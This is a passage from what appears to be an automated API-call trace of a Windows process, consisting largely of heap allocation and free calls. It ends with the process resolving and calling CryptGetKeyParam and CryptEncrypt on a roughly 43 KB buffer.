lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0079.351] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0079.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0079.351] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0079.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0079.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2830 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0079.352] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.352] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.353] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0079.354] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0079.354] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0079.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0079.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0079.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0079.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0079.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.356] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0079.357] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0079.358] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e27c0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27c0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.358] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.358] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.359] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.359] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.359] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xa840, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xa850) returned 1 [0079.359] CharLowerBuffW (in: lpsz="byte[43089]", cchLength=0xb | out: lpsz="byte[43089]") returned 0xb [0079.359] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb1e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.360] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b98e0*, pdwDataLen=0x144e538*=0xa840, dwBufLen=0xa850 | out: pbData=0x49b98e0*, pdwDataLen=0x144e538*=0xa850) returned 1 [0079.360] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.360] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.360] 